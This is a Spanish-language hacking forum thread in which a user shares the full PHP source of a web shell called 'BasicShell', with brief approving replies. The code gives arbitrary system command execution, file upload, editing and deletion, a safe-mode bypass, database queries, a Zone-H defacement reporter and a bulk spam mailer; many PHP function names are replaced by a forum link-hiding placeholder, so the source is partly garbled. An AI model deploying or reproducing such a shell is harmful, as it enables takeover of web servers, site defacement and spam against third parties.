comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Okol BasicShell v1

  • 4 Respuestas
  • 3271 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« en: Enero 16, 2013, 05:09:29 pm »
Hola amigos, espero se encuentren bien.
he estado trabajando en esté proyecto alrededor de tres días, es una shell (Basica).
espero la disfruten y pues cualquier cosa pueden decirla.

Funciones:

-Subir archivos
-Eliminar, crear y modificar archivos.
-Ejecución de comandos en el sistema.
-Bypass Safemode
-Listado de archivos en el directorio.
-Mysql query's
-Encriptar y desencriptar en base64
-Encriptar en MD5
-Zone-h Reporter
-Mailer.

*El servidor no debe tener desactivada la función system()

Espero les pueda servir para algo.
Saludos comunidad.

Source:
Código: PHP
  1. <title>BasicShell</title>
  2. <h1>BasicShell Okol</h1>
  3. <font size="2" color="red">Uname</font><font size="2" color="gray"> <?php You are not allowed to view links. Register or Login('uname -a'); ?></font><br />
  4. <font size="2" color="red">usuario</font><font size="2" color="gray"> <?php You are not allowed to view links. Register or Login('id'); ?></font><br />
  5. <font size="2" color="red">PHP Version</font><font size="2" color="gray"> <?php echo You are not allowed to view links. Register or Login();?></font><br />
  6.  <font size="2" color="red">Tu IP</font><font size="2" color="gray"> <?php ECHO $_SERVER['REMOTE_ADDR']; ?></font><br />
  7.  <font size="2" color="red">Safe Mode</font><font size="2" color="gray"> <?php $safe_mode = @You are not allowed to view links. Register or Login('safe_mode')?'<font color="red">ON</font>':'<font color="green">OFF</font>'; echo $safe_mode; ?></font><br /><br />
  8.  <font size="2">
  9.  <style type="text/css">
  10. input[type='text'] { color: red; width:100px;height:20px;background-color:gray;color:yellow;font-size:10pt; font-family:Verdana;text-align:center}
  11. </style>
  12. <style type="text/css">
  13. textarea{ color: red;width:350px;height:150px;font-size:12px;font-family:Helvetica;background-color:gray;color:yellow;}
  14. </style>
  15. <style type="text/css">
  16. input[type='submit'] { color: red; width:100px;height:20px;background-color:red;color:yellow;font-size:7pt; font-family:Verdana;text-align:center}
  17.  
  18. </style>
  19.  <style type="text/css">
  20.             body { background-color: #000; color: #F80; text-align: center;size:12px; }
  21.             img { width: 18px; height: 18px; }
  22.            
  23.             a { color: #000; text-decoration: none; font-family:Helvetica; size: 9px; }
  24.             td { padding-left: 20px; text-align: justify; }
  25.         </style>
  26. <form action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>" method="post" enctype="multipart/form-data">
  27.  
  28.     <h3>Enviar un nuevo archivo: </h3>
  29.     <br>
  30.     <input name="userfile" type="file">
  31.     <br>
  32.     <input type="submit" value="Enviar" name="subir">
  33.     </form>
  34. <h3>eliminar archivo<br />
  35.  
  36. <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>">
  37.     <input type="text" name="archivoaeliminar">
  38.     <input type="submit" value="Eliminar">
  39.  
  40. <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>">
  41.     <h3>Comando a ejecutar</h3><br />
  42.     <input type="text"  name="ejec"><br />
  43.     <input type="submit" value="Ejecutar"><br />
  44. </form>
  45. <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>">
  46.     <h3>Bypass Safemode</h3><br>
  47.     <input type="submit" name="safemode" value="Bypass safemode">
  48.  
  49. </form>
  50. <?php
  51. echo '<h3>Los archivos en el directorio son:</h3><br>';
  52. #Listado de archivos
  53. if ($gestor = You are not allowed to view links. Register or Login('.')) {
  54.     while (false !== ($entrada = You are not allowed to view links. Register or Login($gestor))) {
  55.         if ($entrada != "." && $entrada != "..") {
  56.             echo '<pre>';
  57.             echo "$entrada\n";
  58.             echo '</pre>';
  59.         }
  60.     }
  61.     You are not allowed to view links. Register or Login($gestor);
  62. }
  63. ?>
  64. <h3>Modificar un archivo existente:</h3>
  65. <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>">
  66.     Nombre de archivo a modificar:<br>
  67.     <input type="text" name="archmod" value="index.php" >
  68.     <input type="submit" name="modificar" value="Abrir archivo"><br><br>
  69.     Codigo<br>
  70.     <textarea name="contenido" cols="80" rows="15">
  71.          <?php
  72.         if(You are not allowed to view links. Register or Login($_POST['archmod']) && $_POST['archmod'] != "")
  73.         {
  74.             echo abrirarchivo($_POST['archmod']);
  75.         }
  76.         ?>
  77.     </textarea><br />
  78.     <input type="submit" name="modificar" value="Guardar cambios"><br>
  79. </form>
  80. <h3>Crear archivo:</h3><br><br>
  81. <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>">
  82.     Nombre del archivo<br />
  83.     <input type="text" name="archivo"><br /><br>
  84.     Codigo<br />
  85.     <textarea name="contenido2" cols="60" rows="15"></textarea><br />
  86.     <input type="submit" value="crear" name="Mod"><br />
  87. </form>
  88. <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']);  ?>">
  89.     <h3>Sentencias Mysql</h3><br>
  90.     Host:<input type="text" name="host">
  91.     User:<input type="text" name="user">
  92.     Password:<input type="text" name="password"><br>
  93.     DB:<input type="text" name="database">
  94.     Query: <input type="text" name="query">
  95.     <input type="submit" value="Ejecutar" name="mysqlsentencia">
  96. </form>
  97. <h3>Cifrar y Descifrar</h3>
  98. <form method="POST" action ="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) ?>">
  99.      Ingrese texto a Desencriptar:<br>
  100.      <input type="text" name="decript64"><br>
  101.      <input type="submit" value="Desencriptar">
  102.      </form>
  103.  
  104. <form method="POST" action ="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) ?>">
  105.      Ingrese texto a encriptar:<br>
  106.      <input type="text" name="encript64"><br>
  107.      <input type="submit" value="Encriptar"><br /><br />
  108.      </form>
  109.  
  110.      <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) ?>">
  111.         Encriptar en MD5<br />
  112.         <input type="text" name="md5en">
  113.         <input type="submit" value="encriptar"><br>
  114.     </form>
  115. <h3>Zone-H Reporter</h3>
  116.     <form method="POST" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) ?>">
  117.     url1:<br><input type="text" name="report" value="http://"><br>
  118. url2:<br><input type="text" name="report1" value="http://"><br>
  119. url3:<br><input type="text" name="report2" value="http://"><br>
  120. url4:<br><input type="text" name="report3" value="http://"><br>
  121. url5:<br><input type="text" name="report4" value="http://"><br>
  122. url6:<br><input type="text" name="report5" value="http://"><br>
  123. url7:<br><input type="text" name="report6" value="http://"><br>
  124. url8:<br><input type="text" name="report7" value="http://"><br>
  125. url9:<br><input type="text" name="report8" value="http://"><br>
  126. url10:<br><input type="text" name="report9" value="http://"><br>
  127.     nick: <br><input type="text" name="nick"><br>
  128.    
  129.     <input type="submit" value="Reportar">
  130.     </form></center>
  131. <h3>Mailer</h3>
  132.     <form method="post" action="<?php You are not allowed to view links. Register or Login($_SERVER['PHP_SELF']) ?>">
  133.         Desde:<input type="text"name="from"><br /><br />
  134.         Asunto<input type="text"name="asunto"><br /><br />
  135.         Numero De Mensajes<input type="text"name="num"><br /><br />
  136.         Para:<textarea name="para"></textarea><br>
  137.         [*]Si son varios mails separalos por coma...<br><br />
  138.         Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
  139.         <center><input type="submit" value="Spam!" name="spam"><br /></center>
  140.     </form>
  141. <?php
  142. @You are not allowed to view links. Register or Login(0);
  143. #Ejecutar comando
  144. function ejecutaros(){
  145.     echo '<textarea cols="70" rows="10">';
  146.     $ejec = @You are not allowed to view links. Register or Login($_POST['ejec']);
  147.     echo '</textarea>';
  148. }
  149. #crear archivo
  150. function crear(){
  151.     $contenido = $_POST['contenido2'];
  152.     $nombre = $_POST['archivo'];
  153.     $crear = @You are not allowed to view links. Register or Login($nombre,'w+');
  154.     @You are not allowed to view links. Register or Login($crear, $contenido);
  155.     @You are not allowed to view links. Register or Login($crear);
  156.     echo 'El archivo se ha creado correctamente.';
  157. }
  158. #Bypass safe mode
  159. function bysafemode(){
  160.     $sacrear = You are not allowed to view links. Register or Login("php.ini",'w+');
  161.     You are not allowed to view links. Register or Login($sacrear, 'safe_mode = Off ');
  162.     You are not allowed to view links. Register or Login($sacrear);
  163.     You are not allowed to view links. Register or Login('chmod 777 php.ini');
  164. }
  165. #Subir archivo
  166. function subir(){
  167. $allowed_ext = "rar,jpg,php,png,txt,html,zip,pl,py,mp3,c";  
  168. $overwrite = "no";
  169. $match = "";
  170. $filesize = $_FILES['userfile']['size'];
  171. $filename = You are not allowed to view links. Register or Login($_FILES['userfile']['name']);
  172.  
  173. if($filesize < 1){
  174.    @$error .= "- Archivo vacío.<br>";
  175. }
  176. $file_ext = You are not allowed to view links. Register or Login("/\./",$filename);
  177. $allowed_ext = You are not allowed to view links. Register or Login("/\,/",$allowed_ext);
  178. foreach($allowed_ext as $ext){
  179.    if($ext==$file_ext[1]) $match = "1";
  180. }
  181. if(@$error){
  182.    print "Se ha producido el siguiente error al subir el archivo:<br> $error";
  183. }else{
  184.    if(You are not allowed to view links. Register or Login($_FILES['userfile']['tmp_name'], $filename)){
  185.       print "<b>$filename</b> se ha subido correctamente!";
  186.    }
  187. }
  188. }
  189. #Mysql Query
  190. function mysqlsen(){
  191.     $host = $_POST['host'];
  192.     $user = $_POST['user'];
  193.     $pass = $_POST['password'];
  194.     $query = $_POST['query'];
  195.     $db = $_POST['database'];
  196.     $con = You are not allowed to view links. Register or Login($host, $user, $pass);
  197.     echo You are not allowed to view links. Register or Login()?"Error: " . You are not allowed to view links. Register or Login():"Conectado con exito\n";
  198.                 You are not allowed to view links. Register or Login($db, $con);
  199.                     echo You are not allowed to view links. Register or Login()?"Error: " . You are not allowed to view links. Register or Login():"DB seleccionada con exito\n\n";
  200.                 $resultado = You are not allowed to view links. Register or Login($query);
  201. if($result)
  202.                 {
  203.                     while($line = You are not allowed to view links. Register or Login($result,MYSQL_ASSOC))
  204.                     {
  205.                         You are not allowed to view links. Register or Login ($line);
  206.                     }
  207.                 }
  208.                 //while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
  209.                 //mysql_free_result($result);
  210.                 //die;
  211.             }
  212.  
  213. function abrirarchivo($arc)
  214. {
  215.      $archivo = @You are not allowed to view links. Register or Login($arc);
  216.      $archivo = You are not allowed to view links. Register or Login($archivo);
  217.      return You are not allowed to view links. Register or Login(@$archivo);
  218. }
  219. #encript b64
  220. function base64en(){
  221.      $encript = You are not allowed to view links. Register or Login($_POST['encript64']);
  222.      echo $encript;
  223. }
  224.  
  225. #Decript b64
  226. function base64de(){
  227.     $decript = You are not allowed to view links. Register or Login($_POST['decript64']);
  228.     echo $decript;
  229. }
  230.  
  231. #encript Md5
  232. function md5encript(){
  233.     $encriptmd5 = You are not allowed to view links. Register or Login($_POST['md5en']);
  234.     echo $encriptmd5;
  235. }
  236.  
  237. #Eliminar archivos
  238. function eliminararch(){
  239. $eliminar = $_POST['archivoaeliminar'];
  240. @You are not allowed to view links. Register or Login($eliminar);
  241. }
  242.  
  243. if(You are not allowed to view links. Register or Login($_POST['contenido2'])){
  244.     crear();
  245. }
  246. if(You are not allowed to view links. Register or Login($_POST['ejec'])){
  247.     ejecutaros();
  248. }
  249. if(You are not allowed to view links. Register or Login($_POST['safemode'])){
  250.     bysafemode();
  251. }
  252. if(You are not allowed to view links. Register or Login($_POST['subir'])){
  253.     subir();
  254. }
  255. if(You are not allowed to view links. Register or Login($_POST['mysqlsentencia'])){
  256.     mysqlsen();
  257. }
  258. if(You are not allowed to view links. Register or Login($_POST['encript64'])){
  259.     base64en();
  260. }
  261. if(You are not allowed to view links. Register or Login($_POST['decript64'])){
  262.     base64de();
  263. }
  264. if(You are not allowed to view links. Register or Login($_POST['md5en'])){
  265.     md5encript();
  266. }
  267. if(You are not allowed to view links. Register or Login($_POST['archivoaeliminar'])){
  268.     eliminararch();
  269. }
  270.      
  271.    
  272.     if(You are not allowed to view links. Register or Login($_POST['report']))
  273.     {
  274.     @$defacer = You are not allowed to view links. Register or Login($_POST['nick']);
  275.     @$url = You are not allowed to view links. Register or Login($_POST['report']);
  276.     @$url2 = You are not allowed to view links. Register or Login($_POST['report1']);
  277.     @$url3 = You are not allowed to view links. Register or Login($_POST['report2']);
  278.     @$url4 = You are not allowed to view links. Register or Login($_POST['report3']);
  279.     @$url5 = You are not allowed to view links. Register or Login($_POST['report4']);
  280.     @$url6 = You are not allowed to view links. Register or Login($_POST['report5']);
  281.     @$url7 = You are not allowed to view links. Register or Login($_POST['report6']);
  282.     @$url8 = You are not allowed to view links. Register or Login($_POST['report7']);
  283.     @$url9 = You are not allowed to view links. Register or Login($_POST['report8']);
  284.     @$url10 = You are not allowed to view links. Register or Login($_POST['report9']);
  285.     function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
  286.     {  
  287.      
  288.     $ch = You are not allowed to view links. Register or Login("http://zone-h.com/notify/mass");
  289.     You are not allowed to view links. Register or Login($ch, CURLOPT_RETURNTRANSFER, 1);
  290.     You are not allowed to view links. Register or Login($ch, CURLOPT_POST, 1);
  291.     You are not allowed to view links. Register or Login($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
  292.     You are not allowed to view links. Register or Login($ch);
  293.     You are not allowed to view links. Register or Login($ch);
  294.     }
  295.      
  296.     ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","6","7");
  297.      
  298.     }
  299.      if(You are not allowed to view links. Register or Login($_POST['spam'])){
  300. $desde = $_POST['from'];
  301. $para= $_POST['para'];
  302. $cont= $_POST['cont'];
  303. $asunto= $_POST['asunto'];
  304. $numsj= $_POST['num'];
  305. $lol=0;
  306. while($lol < $numsj){
  307.     $lol=$lol + 1;
  308. You are not allowed to view links. Register or Login($para,$asunto,$cont,'From:'.$desde);
  309.                     }
  310. if(You are not allowed to view links. Register or Login($para,$asunto,$cont,'From:'.$desde))
  311. {
  312.     echo'<>Enviado Correctamente!<br>';
  313.  
  314. }else{
  315.     echo '<center>No se pudo enviar el mensaje<br>';
  316. }
  317. }
  318.  
  319. ?>
  320. <font size="2" color="gray">By Okol twitter: @Okoltutos | HackxCrack | Underc0de | StrikeGeek | Greetz: all my friends</font>
« Última modificación: Enero 16, 2013, 05:26:20 pm por Okol »
Underc0de Manager!

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Enero 16, 2013, 05:36:40 pm »
Dalee
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Turka

  • *
  • Underc0der
  • Mensajes: 101
  • Actividad:
    0%
  • Reputación 0
  • Turca por herencia.
    • Ver Perfil
  • Skype: turka.xd
« Respuesta #2 en: Enero 16, 2013, 06:21:47 pm »
Bien amigo, veo que vas progresando en PHP :) yo tmb habia programado una hace unos años, aprendaras mucho con eso ve mejorandola, cualquier cosa me tienes en el skype ;)

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #3 en: Enero 16, 2013, 06:29:08 pm »
Ya estas turkita :'3
un abrazo amiga.
Underc0de Manager!

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #4 en: Enero 16, 2013, 08:32:37 pm »
Te ha quedao de PTM bro, sigue asi  ;D

-Saludos-

 

¿Te gustó el post? COMPARTILO!